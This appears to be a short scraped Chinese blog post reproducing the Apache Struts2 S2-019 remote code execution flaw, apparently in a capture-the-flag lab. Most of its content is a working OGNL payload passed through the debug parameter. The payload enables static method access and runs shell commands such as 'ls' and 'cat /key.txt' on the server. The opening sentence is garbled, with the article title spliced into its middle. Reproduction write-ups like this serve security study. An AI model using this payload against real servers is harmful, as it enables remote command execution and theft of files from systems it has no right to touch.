動(dòng)態(tài)方法調(diào)用是一種已知會(huì)施加可 Apache Struts2遠(yuǎn)程代碼執(zhí)行漏洞(S2-019)復(fù)現(xiàn)能的安全漏洞的機(jī)制，但到目前為止，它默認(rèn)啟用，警告用戶應(yīng)盡可能將其關(guān)閉。

S2-019的poc,是debug=command&expression=#f=#_memberAccess.getClass().getDeclaredField(‘a(chǎn)llowStaticMethodAccess’),#f.setAccessible(true),#f.set(#_memberAccess,true),#req=@org.apache.struts2.ServletActionContext@getRequest(),#resp=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#a=(new java.lang.ProcessBuilder(new java.lang.String[]{‘ls’})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[1000],#d.read(#e),#resp.println(#e),#resp.close()使用url編碼hackbar執(zhí)行,得到key.txt所在的目錄

修改為cat /key.txt，進(jìn)行url編碼，hackbar執(zhí)行，得到key。

總結(jié)

以上是生活随笔為你收集整理的Apache Struts2远程代码执行漏洞(S2-019)复现的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。